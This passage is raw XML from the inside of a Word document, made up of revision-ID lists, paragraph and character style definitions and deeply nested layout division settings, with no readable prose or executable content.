    <w:rsid w:val="00216F4F"/>
    <w:rsid w:val="00225E14"/>
    <w:rsid w:val="00230F53"/>
    <w:rsid w:val="00235AD1"/>
    <w:rsid w:val="00236C71"/>
    <w:rsid w:val="0023762C"/>
    <w:rsid w:val="002424B0"/>
    <w:rsid w:val="00250CA4"/>
    <w:rsid w:val="00265883"/>
    <w:rsid w:val="002707F3"/>
    <w:rsid w:val="00270C1B"/>
    <w:rsid w:val="002750FB"/>
    <w:rsid w:val="00282B27"/>
    <w:rsid w:val="00285307"/>
    <w:rsid w:val="00285B3E"/>
    <w:rsid w:val="00290177"/>
    <w:rsid w:val="002947D3"/>
    <w:rsid w:val="002A3339"/>
    <w:rsid w:val="002A77BD"/>
    <w:rsid w:val="002B08EF"/>
    <w:rsid w:val="002B6B79"/>
    <w:rsid w:val="002C00C7"/>
    <w:rsid w:val="002C42B1"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C5EE0"/>
    <w:rsid w:val="002C752D"/>
    <w:rsid w:val="002D2F88"/>
    <w:rsid w:val="002D35DB"/>
    <w:rsid w:val="002D391C"/>
    <w:rsid w:val="002D6AC0"/>
    <w:rsid w:val="002E06CA"/>
    <w:rsid w:val="002E1005"/>
    <w:rsid w:val="002E3940"/>
    <w:rsid w:val="002E4D3C"/>
    <w:rsid w:val="002E576F"/>
    <w:rsid w:val="0030154A"/>
    <w:rsid w:val="003047A6"/>
    <w:rsid w:val="003064C5"/>
    <w:rsid w:val="00314E40"/>
    <w:rsid w:val="003156F1"/>
    <w:rsid w:val="00315B5F"/>
    <w:rsid w:val="00317DDF"/>
    <w:rsid w:val="003206E6"/>
    <w:rsid w:val="003218F7"/>
    <w:rsid w:val="00324525"/>
    <w:rsid w:val="00324551"/>
    <w:rsid w:val="003334CD"/>
    <w:rsid w:val="00335A2B"/>
    <w:rsid w:val="00344E70"/>
    <w:rsid w:val="00346251"/>
    <w:rsid w:val="00356FC8"/>
    <w:rsid w:val="00357483"/>
    <w:rsid w:val="0035756C"/>
    <w:rsid w:val="00363211"/>
    <w:rsid w:val="0036433F"/>
    <w:rsid w:val="003664A9"/>
    <w:rsid w:val="0037032B"/>
    <w:rsid w:val="0037153A"/>
    <w:rsid w:val="0037217A"/>
    <w:rsid w:val="00381C9D"/>
    <w:rsid w:val="00383172"/>
    <w:rsid w:val="0039053B"/>
    <w:rsid w:val="00396EC7"/>
    <w:rsid w:val="003A6250"/>
    <w:rsid w:val="003C7214"/>
    <w:rsid w:val="003C7EFF"/>
    <w:rsid w:val="003D4916"/>
    <w:rsid w:val="003D57B9"/>
    <w:rsid w:val="003D73A6"/>
    <w:rsid w:val="003F7F86"/>
    <w:rsid w:val="00412D58"/>
    <w:rsid w:val="00417D85"/>
    <w:rsid w:val="00420090"/>
    <w:rsid w:val="004225B9"/>
    <w:rsid w:val="0042357C"/>
    <w:rsid w:val="00425D6C"/>
    <w:rsid w:val="004332C1"/>
    <w:rsid w:val="00437A74"/>
    <w:rsid w:val="00446645"/>
    <w:rsid w:val="00447BB6"/>
    <w:rsid w:val="004501C5"/>
    <w:rsid w:val="004538F3"/>
    <w:rsid w:val="00456169"/>
    <w:rsid w:val="00456FEC"/>
    <w:rsid w:val="004610BE"/>
    <w:rsid w:val="004617D8"/>
    <w:rsid w:val="00462D54"/>
    <w:rsid w:val="00466476"/>
    <w:rsid w:val="00471697"/>
    <w:rsid w:val="0047444C"/>
    <w:rsid w:val="0047506D"/>
    <w:rsid w:val="00490721"/>
    <w:rsid w:val="00490C41"/>
    <w:rsid w:val="004923B8"/>
    <w:rsid w:val="00496C04"/>
    <w:rsid w:val="00497DBF"/>
    <w:rsid w:val="004A10D2"/>
    <w:rsid w:val="004A4E96"/>
    <w:rsid w:val="004A69DC"/>
    <w:rsid w:val="004B1E2E"/>
    <w:rsid w:val="004B5103"/>
    <w:rsid w:val="004C0A24"/>
    <w:rsid w:val="004C4233"/>
    <w:rsid w:val="004C72D5"/>
    <w:rsid w:val="004D7288"/>
    <w:rsid w:val="004E0255"/>
    <w:rsid w:val="004E606D"/>
    <w:rsid w:val="004F070C"/>
    <w:rsid w:val="00500D40"/>
    <w:rsid w:val="005125D3"/>
    <w:rsid w:val="005206A8"/>
    <w:rsid w:val="00532377"/>
    <w:rsid w:val="00533443"/>
    <w:rsid w:val="00540116"/>
    <w:rsid w:val="00540754"/>
    <w:rsid w:val="00542C60"/>
    <w:rsid w:val="0054750E"/>
    <w:rsid w:val="00551170"/>
    <w:rsid w:val="00551B02"/>
    <w:rsid w:val="005523EA"/>
    <w:rsid w:val="00554427"/>
    <w:rsid w:val="005550B4"/>
    <w:rsid w:val="00563E42"/>
    <w:rsid w:val="005645C5"/>
    <w:rsid w:val="00566BD8"/>
    <w:rsid w:val="00580173"/>
    <w:rsid w:val="00584BB4"/>
    <w:rsid w:val="00592AAD"/>
    <w:rsid w:val="005A2F53"/>
    <w:rsid w:val="005A310B"/>
    <w:rsid w:val="005A3677"/>
    <w:rsid w:val="005A3DB9"/>
    <w:rsid w:val="005A3FA5"/>
    <w:rsid w:val="005A6416"/>
    <w:rsid w:val="005B0E1E"/>
    <w:rsid w:val="005B69CD"/>
    <w:rsid w:val="005B6B7D"/>
    <w:rsid w:val="005C5935"/>
    <w:rsid w:val="005D485C"/>
    <w:rsid w:val="005D4E2F"/>
    <w:rsid w:val="005F3267"/>
    <w:rsid w:val="00606260"/>
    <w:rsid w:val="00607675"/>
    <w:rsid w:val="0060782B"/>
    <w:rsid w:val="00607983"/>
    <w:rsid w:val="00614602"/>
    <w:rsid w:val="00640D5E"/>
    <w:rsid w:val="0064432C"/>
    <w:rsid w:val="006503A4"/>
    <w:rsid w:val="006515FE"/>
    <w:rsid w:val="00661643"/>
    <w:rsid w:val="00662975"/>
    <w:rsid w:val="00664AB6"/>
    <w:rsid w:val="00667680"/>
    <w:rsid w:val="00671981"/>
    <w:rsid w:val="00673F81"/>
    <w:rsid w:val="00685728"/>
    <w:rsid w:val="00687700"/>
    <w:rsid w:val="00693164"/>
    <w:rsid w:val="00696B2E"/>
    <w:rsid w:val="00697355"/>
    <w:rsid w:val="006A3FD6"/>
    <w:rsid w:val="006A4754"/>
    <w:rsid w:val="006A6CDF"/>
    <w:rsid w:val="006B0C9A"/>
    <w:rsid w:val="006B7E1F"/>
    <w:rsid w:val="006C1146"/>
    <w:rsid w:val="006C5315"/>
    <w:rsid w:val="006E2086"/>
    <w:rsid w:val="006E4576"/>
    <w:rsid w:val="006E6E77"/>
    <w:rsid w:val="006F2630"/>
    <w:rsid w:val="006F2D28"/>
    <w:rsid w:val="006F4AEB"/>
    <w:rsid w:val="006F6C5F"/>
    <w:rsid w:val="007079F8"/>
    <w:rsid w:val="00715083"/>
    <w:rsid w:val="007152EB"/>
    <w:rsid w:val="007159A0"/>
    <w:rsid w:val="00716B61"/>
    <w:rsid w:val="0071757B"/>
    <w:rsid w:val="007217A6"/>
    <w:rsid w:val="00721CDA"/>
    <w:rsid w:val="00723533"/>
    <w:rsid w:val="00724FF6"/>
    <w:rsid w:val="00726034"/>
    <w:rsid w:val="007275FA"/>
    <w:rsid w:val="0073148E"/>
    <w:rsid w:val="00736527"/>
    <w:rsid w:val="00736A51"/>
    <w:rsid w:val="00740D5F"/>
    <w:rsid w:val="007416FA"/>
    <w:rsid w:val="0074270C"/>
    <w:rsid w:val="00744137"/>
    <w:rsid w:val="00753215"/>
    <w:rsid w:val="007534AE"/>
    <w:rsid w:val="00753F5A"/>
    <w:rsid w:val="007601FE"/>
    <w:rsid w:val="00760754"/>
    <w:rsid w:val="007625EF"/>
    <w:rsid w:val="007630B6"/>
    <w:rsid w:val="00765328"/>
    <w:rsid w:val="00765EFD"/>
    <w:rsid w:val="00770BE1"/>
    <w:rsid w:val="00770C71"/>
    <w:rsid w:val="007750F9"/>
    <w:rsid w:val="00776E28"/>
    <w:rsid w:val="00777FA4"/>
    <w:rsid w:val="0078383A"/>
    <w:rsid w:val="0079055A"/>
    <w:rsid w:val="0079171B"/>
    <w:rsid w:val="00792D20"/>
    <w:rsid w:val="00794BE8"/>
    <w:rsid w:val="00795064"/>
    <w:rsid w:val="007A3BF3"/>
    <w:rsid w:val="007A465D"/>
    <w:rsid w:val="007A508C"/>
    <w:rsid w:val="007B3D1E"/>
    <w:rsid w:val="007B7A9D"/>
    <w:rsid w:val="007D1A77"/>
    <w:rsid w:val="007D3F29"/>
    <w:rsid w:val="007D7DA6"/>
    <w:rsid w:val="007E515A"/>
    <w:rsid w:val="007F5232"/>
    <w:rsid w:val="007F5CB6"/>
    <w:rsid w:val="007F69D1"/>
    <w:rsid w:val="008113CB"/>
    <w:rsid w:val="00815D6F"/>
    <w:rsid w:val="00821866"/>
    <w:rsid w:val="00821EEB"/>
    <w:rsid w:val="00824816"/>
    <w:rsid w:val="00827424"/>
    <w:rsid w:val="00836447"/>
    <w:rsid w:val="00840148"/>
    <w:rsid w:val="008445ED"/>
    <w:rsid w:val="008475B0"/>
    <w:rsid w:val="00851757"/>
    <w:rsid w:val="00852A15"/>
    <w:rsid w:val="008560DB"/>
    <w:rsid w:val="00864391"/>
    <w:rsid w:val="00864553"/>
    <w:rsid w:val="008815EF"/>
    <w:rsid w:val="00887A85"/>
    <w:rsid w:val="0089428B"/>
    <w:rsid w:val="008A507C"/>
    <w:rsid w:val="008A62E3"/>
    <w:rsid w:val="008B4F8C"/>
    <w:rsid w:val="008C72F7"/>
    <w:rsid w:val="008C78A9"/>
    <w:rsid w:val="008D03C4"/>
    <w:rsid w:val="008D32D5"/>
    <w:rsid w:val="009043B1"/>
    <w:rsid w:val="009046A8"/>
    <w:rsid w:val="00904EC0"/>
    <w:rsid w:val="00913D46"/>
    <w:rsid w:val="00914BEE"/>
    <w:rsid w:val="00920B97"/>
    <w:rsid w:val="00921930"/>
    <w:rsid w:val="00922AC8"/>
    <w:rsid w:val="00923097"/>
    <w:rsid w:val="00923FD6"/>
    <w:rsid w:val="00933241"/>
    <w:rsid w:val="009344B0"/>
    <w:rsid w:val="00937918"/>
    <w:rsid w:val="00941265"/>
    <w:rsid w:val="009430A2"/>
    <w:rsid w:val="00953997"/>
    <w:rsid w:val="00956D27"/>
    <w:rsid w:val="00960558"/>
    <w:rsid w:val="009734EE"/>
    <w:rsid w:val="00977577"/>
    <w:rsid w:val="00983468"/>
    <w:rsid w:val="0099054D"/>
    <w:rsid w:val="0099164C"/>
    <w:rsid w:val="0099184D"/>
    <w:rsid w:val="00993414"/>
    <w:rsid w:val="00993EB0"/>
    <w:rsid w:val="00995C7F"/>
    <w:rsid w:val="009A1DB3"/>
    <w:rsid w:val="009A4D0A"/>
    <w:rsid w:val="009A7EAE"/>
    <w:rsid w:val="009B4DA3"/>
    <w:rsid w:val="009B6F31"/>
    <w:rsid w:val="009C0E57"/>
    <w:rsid w:val="009C1722"/>
    <w:rsid w:val="009C434B"/>
    <w:rsid w:val="009C47B8"/>
    <w:rsid w:val="009C7DF6"/>
    <w:rsid w:val="009D194F"/>
    <w:rsid w:val="009D319A"/>
    <w:rsid w:val="009E0508"/>
    <w:rsid w:val="009E052D"/>
    <w:rsid w:val="009E06EE"/>
    <w:rsid w:val="009F00D2"/>
    <w:rsid w:val="009F3D85"/>
    <w:rsid w:val="00A00CD1"/>
    <w:rsid w:val="00A06413"/>
    <w:rsid w:val="00A07FA9"/>
    <w:rsid w:val="00A12055"/>
    <w:rsid w:val="00A15141"/>
    <w:rsid w:val="00A15A34"/>
    <w:rsid w:val="00A2552F"/>
    <w:rsid w:val="00A263ED"/>
    <w:rsid w:val="00A3515B"/>
    <w:rsid w:val="00A35ABE"/>
    <w:rsid w:val="00A42478"/>
    <w:rsid w:val="00A43808"/>
    <w:rsid w:val="00A44C72"/>
    <w:rsid w:val="00A55D02"/>
    <w:rsid w:val="00A5636A"/>
    <w:rsid w:val="00A57C21"/>
    <w:rsid w:val="00A6235E"/>
    <w:rsid w:val="00A64414"/>
    <w:rsid w:val="00A6673D"/>
    <w:rsid w:val="00A7404D"/>
    <w:rsid w:val="00A80C0A"/>
    <w:rsid w:val="00A80F4F"/>
    <w:rsid w:val="00A84E9E"/>
    <w:rsid w:val="00A85CD3"/>
    <w:rsid w:val="00A87804"/>
    <w:rsid w:val="00A918CE"/>
    <w:rsid w:val="00A92E8E"/>
    <w:rsid w:val="00A95E1B"/>
    <w:rsid w:val="00A960EF"/>
    <w:rsid w:val="00AA1642"/>
    <w:rsid w:val="00AA1C9F"/>
    <w:rsid w:val="00AB59D6"/>
    <w:rsid w:val="00AC7480"/>
    <w:rsid w:val="00AD027F"/>
    <w:rsid w:val="00AD0359"/>
    <w:rsid w:val="00AD28A9"/>
    <w:rsid w:val="00AD663F"/>
    <w:rsid w:val="00AE1E7B"/>
    <w:rsid w:val="00AE7656"/>
    <w:rsid w:val="00AF14A3"/>
    <w:rsid w:val="00AF1F1C"/>
    <w:rsid w:val="00AF5715"/>
    <w:rsid w:val="00AF6577"/>
    <w:rsid w:val="00B017B8"/>
    <w:rsid w:val="00B07743"/>
    <w:rsid w:val="00B10E09"/>
    <w:rsid w:val="00B11D3C"/>
    <w:rsid w:val="00B1380B"/>
    <w:rsid w:val="00B14E7F"/>
    <w:rsid w:val="00B2079C"/>
    <w:rsid w:val="00B250CB"/>
    <w:rsid w:val="00B31187"/>
    <w:rsid w:val="00B3278A"/>
    <w:rsid w:val="00B35D05"/>
    <w:rsid w:val="00B37AEA"/>
    <w:rsid w:val="00B43380"/>
    <w:rsid w:val="00B471C3"/>
    <w:rsid w:val="00B52508"/>
    <w:rsid w:val="00B532C4"/>
    <w:rsid w:val="00B54E04"/>
    <w:rsid w:val="00B56195"/>
    <w:rsid w:val="00B63225"/>
    <w:rsid w:val="00B633A2"/>
    <w:rsid w:val="00B65E62"/>
    <w:rsid w:val="00B925DF"/>
    <w:rsid w:val="00B9353F"/>
    <w:rsid w:val="00BB2E0E"/>
    <w:rsid w:val="00BB6006"/>
    <w:rsid w:val="00BB66C4"/>
    <w:rsid w:val="00BB78D7"/>
    <w:rsid w:val="00BC18F6"/>
    <w:rsid w:val="00BC1AC0"/>
    <w:rsid w:val="00BD5DEF"/>
    <w:rsid w:val="00BE35C5"/>
    <w:rsid w:val="00C02C04"/>
    <w:rsid w:val="00C04244"/>
    <w:rsid w:val="00C04E29"/>
    <w:rsid w:val="00C05CCD"/>
    <w:rsid w:val="00C10A57"/>
    <w:rsid w:val="00C14F30"/>
    <w:rsid w:val="00C30DE0"/>
    <w:rsid w:val="00C475C3"/>
    <w:rsid w:val="00C52D67"/>
    <w:rsid w:val="00C63B34"/>
    <w:rsid w:val="00C766E3"/>
    <w:rsid w:val="00C77E62"/>
    <w:rsid w:val="00C8027C"/>
    <w:rsid w:val="00C802AB"/>
    <w:rsid w:val="00C816AC"/>
    <w:rsid w:val="00C824A9"/>
    <w:rsid w:val="00C83AE3"/>
    <w:rsid w:val="00C84DB2"/>
    <w:rsid w:val="00C904BC"/>
    <w:rsid w:val="00C95709"/>
    <w:rsid w:val="00C957C3"/>
    <w:rsid w:val="00CA27FA"/>
    <w:rsid w:val="00CB04F4"/>
    <w:rsid w:val="00CB3C9C"/>
    <w:rsid w:val="00CB5728"/>
    <w:rsid w:val="00CC28A4"/>
    <w:rsid w:val="00CD5D62"/>
    <w:rsid w:val="00CD5DC5"/>
    <w:rsid w:val="00CD6B1D"/>
    <w:rsid w:val="00CE6916"/>
    <w:rsid w:val="00CE7DCC"/>
    <w:rsid w:val="00CF5A17"/>
    <w:rsid w:val="00D00D6B"/>
    <w:rsid w:val="00D05141"/>
    <w:rsid w:val="00D0519F"/>
    <w:rsid w:val="00D07D28"/>
    <w:rsid w:val="00D1200F"/>
    <w:rsid w:val="00D13BF5"/>
    <w:rsid w:val="00D20F41"/>
    <w:rsid w:val="00D25AA3"/>
    <w:rsid w:val="00D26562"/>
    <w:rsid w:val="00D30699"/>
    <w:rsid w:val="00D33E9E"/>
    <w:rsid w:val="00D4052B"/>
    <w:rsid w:val="00D41249"/>
    <w:rsid w:val="00D47CB0"/>
    <w:rsid w:val="00D528BD"/>
    <w:rsid w:val="00D611D1"/>
    <w:rsid w:val="00D615B5"/>
    <w:rsid w:val="00D62F4D"/>
    <w:rsid w:val="00D63F7B"/>
    <w:rsid w:val="00D65BE2"/>
    <w:rsid w:val="00D66C79"/>
    <w:rsid w:val="00D729CD"/>
    <w:rsid w:val="00D734CA"/>
    <w:rsid w:val="00D77CF5"/>
    <w:rsid w:val="00D81EF6"/>
    <w:rsid w:val="00D8435F"/>
    <w:rsid w:val="00D91326"/>
    <w:rsid w:val="00D91B7E"/>
    <w:rsid w:val="00D9408A"/>
    <w:rsid w:val="00D95F10"/>
    <w:rsid w:val="00DA1F7D"/>
    <w:rsid w:val="00DB1889"/>
    <w:rsid w:val="00DC352F"/>
    <w:rsid w:val="00DD2C90"/>
    <w:rsid w:val="00DD32B6"/>
    <w:rsid w:val="00DD6603"/>
    <w:rsid w:val="00DE290F"/>
    <w:rsid w:val="00DE3B8A"/>
    <w:rsid w:val="00DE4AB4"/>
    <w:rsid w:val="00DE59D6"/>
    <w:rsid w:val="00DE77EE"/>
    <w:rsid w:val="00DF485D"/>
    <w:rsid w:val="00E032DA"/>
    <w:rsid w:val="00E039E6"/>
    <w:rsid w:val="00E061A0"/>
    <w:rsid w:val="00E161BA"/>
    <w:rsid w:val="00E23EF9"/>
    <w:rsid w:val="00E25F77"/>
    <w:rsid w:val="00E26C81"/>
    <w:rsid w:val="00E309C4"/>
    <w:rsid w:val="00E315F1"/>
    <w:rsid w:val="00E33768"/>
    <w:rsid w:val="00E439DE"/>
    <w:rsid w:val="00E4546B"/>
    <w:rsid w:val="00E512AE"/>
    <w:rsid w:val="00E535B7"/>
    <w:rsid w:val="00E554AA"/>
    <w:rsid w:val="00E56B9A"/>
    <w:rsid w:val="00E61D96"/>
    <w:rsid w:val="00E62C97"/>
    <w:rsid w:val="00E63DCE"/>
    <w:rsid w:val="00E72E9E"/>
    <w:rsid w:val="00E762E0"/>
    <w:rsid w:val="00E84ACE"/>
    <w:rsid w:val="00EB2AB9"/>
    <w:rsid w:val="00EB2D50"/>
    <w:rsid w:val="00EC53D4"/>
    <w:rsid w:val="00EC6547"/>
    <w:rsid w:val="00EC6AE1"/>
    <w:rsid w:val="00EC7B44"/>
    <w:rsid w:val="00ED0143"/>
    <w:rsid w:val="00ED2273"/>
    <w:rsid w:val="00EE43E3"/>
    <w:rsid w:val="00EE5CAC"/>
    <w:rsid w:val="00EE639A"/>
    <w:rsid w:val="00EF010D"/>
    <w:rsid w:val="00EF481A"/>
    <w:rsid w:val="00EF6EEC"/>
    <w:rsid w:val="00F00915"/>
    <w:rsid w:val="00F01D2D"/>
    <w:rsid w:val="00F04623"/>
    <w:rsid w:val="00F170A7"/>
    <w:rsid w:val="00F2104C"/>
    <w:rsid w:val="00F231DC"/>
    <w:rsid w:val="00F3501F"/>
    <w:rsid w:val="00F36637"/>
    <w:rsid w:val="00F37DE0"/>
    <w:rsid w:val="00F436ED"/>
    <w:rsid w:val="00F45EDA"/>
    <w:rsid w:val="00F47FBD"/>
    <w:rsid w:val="00F55C72"/>
    <w:rsid w:val="00F57F70"/>
    <w:rsid w:val="00F60149"/>
    <w:rsid w:val="00F602FA"/>
    <w:rsid w:val="00F67E78"/>
    <w:rsid w:val="00F7075F"/>
    <w:rsid w:val="00F709EB"/>
    <w:rsid w:val="00F7307B"/>
    <w:rsid w:val="00F76C1A"/>
    <w:rsid w:val="00F846B2"/>
    <w:rsid w:val="00F84927"/>
    <w:rsid w:val="00F924C6"/>
    <w:rsid w:val="00FA513A"/>
    <w:rsid w:val="00FB40DA"/>
    <w:rsid w:val="00FC3BEF"/>
    <w:rsid w:val="00FC4830"/>
    <w:rsid w:val="00FD709E"/>
    <w:rsid w:val="00FD76E4"/>
    <w:rsid w:val="00FE1450"/>
    <w:rsid w:val="00FE1477"/>
    <w:rsid w:val="00FE14AF"/>
    <w:rsid w:val="00FE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FE53"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0A11F1A4-62C5-4E24-A68B-B8382C77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FD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00344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4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E70"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="m-8155263054288133603msolistparagraph">
    <w:name w:val="m_-8155263054288133603msolistparagraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00344E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C1146"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C1146"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C1146"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F436ED"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00744137"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="r-crgep1">
    <w:name w:val="r-crgep1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0074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48539">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="843783972">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2042395567">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="153029939">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="22832095">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1392970793">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1862891460">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="2006083631">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1774519483">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="671640466">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="607928475">
                                          <w:marLeft w:val="0"/>
                                          <w:marRight w:val="0"/>
                                          <w:marTop w:val="0"/>
                                          <w:marBottom w:val="0"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                          <w:divsChild>
                                            <w:div w:id="1673485583">
                                              <w:marLeft w:val="0"/>
                                              <w:marRight w:val="0"/>
                                              <w:marTop w:val="0"/>
                                              <w:marBottom w:val="0"/>
                                              <w:divBdr>
                                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                              </w:divBdr>
                                              <w:divsChild>
                                                <w:div w:id="1951276210">
                                                  <w:marLeft w:val="0"/>
                                                  <w:marRight w:val="0"/>
                                                  <w:marTop w:val="0"/>
                                                  <w:marBottom w:val="0"/>
                                                  <w:divBdr>
                                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
